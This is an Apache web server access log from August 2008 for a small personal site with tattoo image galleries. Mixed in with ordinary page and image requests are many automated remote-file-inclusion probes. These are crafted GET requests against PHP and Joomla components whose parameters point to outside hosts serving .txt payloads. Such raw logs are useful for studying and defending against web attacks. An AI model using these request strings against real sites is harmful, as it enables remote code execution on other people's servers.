74.32.91.70 - - [06/Aug/2008:23:43:29 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:42 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:42 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:42 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:43 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:43 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:43 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:43 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:43 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:43 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:43 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:43 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
70.85.102.100 - - [06/Aug/2008:23:43:44 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
70.85.102.100 - - [06/Aug/2008:23:43:45 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.32.91.70 - - [06/Aug/2008:23:43:58 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:58 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:58 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:59 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
208.100.1.165 - - [06/Aug/2008:23:44:02 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
208.100.1.165 - - [06/Aug/2008:23:44:02 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
216.14.123.10 - - [06/Aug/2008:23:44:09 -0500] "GET /logs/access_log.1212883200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://artworkmarket.com/components/rey? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
208.100.1.165 - - [06/Aug/2008:23:44:19 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
208.100.1.165 - - [06/Aug/2008:23:44:19 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
208.100.1.165 - - [06/Aug/2008:23:44:19 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
208.100.1.165 - - [06/Aug/2008:23:44:19 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
65.214.45.100 - - [06/Aug/2008:23:44:30 -0500] "GET /tattoo/msameric.JPG HTTP/1.0" 200 14283 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
212.97.132.101 - - [06/Aug/2008:23:44:31 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 321 "-""libwww-perl/5.53"
125.24.46.191 - - [06/Aug/2008:23:45:05 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
125.24.46.191 - - [06/Aug/2008:23:45:06 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.6.18.231 - - [06/Aug/2008:23:45:31 -0500] "GET /logs/access_log.1168300800 HTTP/1.0" 200 383384 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.23.156.36 - - [06/Aug/2008:23:48:27 -0500] "GET /logs/access_log.1203638400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
70.84.182.98 - - [06/Aug/2008:23:49:15 -0500] "GET /logs/access_log.1212883200/oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
75.158.65.225 - - [06/Aug/2008:23:50:11 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:11 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:11 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:23 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:23 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:23 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:23 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:23 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:23 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:23 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:23 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:23 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:24 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:24 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:29 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:30 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:30 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:30 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:30 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:30 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:30 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:30 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:30 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:30 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
75.158.65.225 - - [06/Aug/2008:23:50:31 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
70.85.102.100 - - [06/Aug/2008:23:51:41 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
70.85.102.100 - - [06/Aug/2008:23:51:41 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
203.98.87.14 - - [06/Aug/2008:23:51:42 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
203.98.87.14 - - [06/Aug/2008:23:51:43 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
212.97.132.101 - - [06/Aug/2008:23:54:58 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 311 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:54:58 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 311 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:54:59 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 306 "-""libwww-perl/5.53"
212.97.132.101 - - [06/Aug/2008:23:54:59 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 306 "-""libwww-perl/5.53"
64.22.100.83 - - [06/Aug/2008:23:55:37 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.813"
64.22.100.83 - - [06/Aug/2008:23:55:37 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.813"
70.84.182.98 - - [06/Aug/2008:23:57:11 -0500] "GET /logs/access_log.1203120000/oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
70.84.182.98 - - [06/Aug/2008:23:59:10 -0500] "GET /logs/access_log.1213142400/oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
70.84.182.98 - - [06/Aug/2008:23:59:59 -0500] "GET /logs/access_log.1213315200/oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
77.90.20.2 - - [07/Aug/2008:00:00:29 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:00:00:34 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
70.84.182.98 - - [07/Aug/2008:00:00:42 -0500] "GET /logs/access_log.1214438400/oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
72.248.189.215 - - [07/Aug/2008:00:00:57 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
72.248.189.215 - - [07/Aug/2008:00:00:58 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
203.98.87.14 - - [07/Aug/2008:00:01:33 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
203.98.87.14 - - [07/Aug/2008:00:01:34 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
89.108.67.156 - - [07/Aug/2008:00:03:26 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/stevf57/id.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
89.108.67.156 - - [07/Aug/2008:00:03:26 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/stevf57/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
216.246.78.8 - - [07/Aug/2008:00:03:53 -0500] "GET //?path%5Bdocroot%5D=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
210.4.13.173 - - [07/Aug/2008:00:04:10 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
210.4.13.173 - - [07/Aug/2008:00:04:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
70.84.182.98 - - [07/Aug/2008:00:04:27 -0500] "GET /logs/access_log.1206230400/oneadmin/calendar/include.php?path[docroot]=http://myplaceol.org/photos/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
82.49.28.184 - - [07/Aug/2008:00:05:23 -0500] "GET /?sourcedir=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.808"
82.49.28.184 - - [07/Aug/2008:00:05:24 -0500] "GET /logs/?sourcedir=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 200 94311 "-""libwww-perl/5.808"
216.246.78.8 - - [07/Aug/2008:00:07:47 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 200 94316 "-""libwww-perl/5.810"
216.246.78.8 - - [07/Aug/2008:00:07:47 -0500] "GET //?path%5Bdocroot%5D=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
65.214.45.147 - - [07/Aug/2008:00:07:51 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.0" 200 3085 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
208.100.1.165 - - [07/Aug/2008:00:08:51 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
208.100.1.165 - - [07/Aug/2008:00:08:51 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
208.100.1.165 - - [07/Aug/2008:00:08:51 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
208.100.1.165 - - [07/Aug/2008:00:08:51 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
208.100.1.165 - - [07/Aug/2008:00:08:53 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
208.100.1.165 - - [07/Aug/2008:00:08:53 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
65.214.44.28 - - [07/Aug/2008:00:10:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [07/Aug/2008:00:11:04 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [07/Aug/2008:00:11:04 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [07/Aug/2008:00:11:04 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [07/Aug/2008:00:11:04 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [07/Aug/2008:00:11:04 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [07/Aug/2008:00:11:04 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
88.191.59.190 - - [07/Aug/2008:00:13:04 -0500] "GET /logs/errors.php?error=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:13:05 -0500] "GET /errors.php?error=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.97.132.101 - - [07/Aug/2008:00:13:46 -0500] "GET /logs/access_log.1213142400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 309 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:00:13:47 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 282 "-""libwww-perl/5.53"
212.97.132.101 - - [07/Aug/2008:00:13:47 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 287 "-""libwww-perl/5.53"
66.79.163.110 - - [07/Aug/2008:00:14:12 -0500] "GET /logs/access_log.1214438400/?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
88.191.59.190 - - [07/Aug/2008:00:17:07 -0500] "GET /errors.php?error=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.224.152.230 - - [07/Aug/2008:00:17:42 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
66.224.152.230 - - [07/Aug/2008:00:17:43 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
66.224.152.230 - - [07/Aug/2008:00:18:00 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
66.224.152.230 - - [07/Aug/2008:00:18:00 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
212.97.132.101 - - [07/Aug/2008:00:18:27 -0500] "GET /logs/access_log.1214438400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 309 "-""libwww-perl/5.53"
72.248.189.215 - - [07/Aug/2008:00:18:59 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
72.248.189.215 - - [07/Aug/2008:00:18:59 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
88.191.59.190 - - [07/Aug/2008:00:19:16 -0500] "GET /logs//appserv/main.php?appserv_root=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:19:16 -0500] "GET //appserv/main.php?appserv_root=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
64.22.100.83 - - [07/Aug/2008:00:23:16 -0500] "GET /logs/scanhttp://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:23:16 -0500] "GET /scanhttp://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:23:17 -0500] "GET /logs/scanhttp://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:23:18 -0500] "GET /scanhttp://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.813"
66.79.163.110 - - [07/Aug/2008:00:26:41 -0500] "GET /logs/access_log.1212883200/?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
87.106.191.136 - - [07/Aug/2008:00:26:58 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.191.136 - - [07/Aug/2008:00:26:59 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
203.98.87.14 - - [07/Aug/2008:00:27:28 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
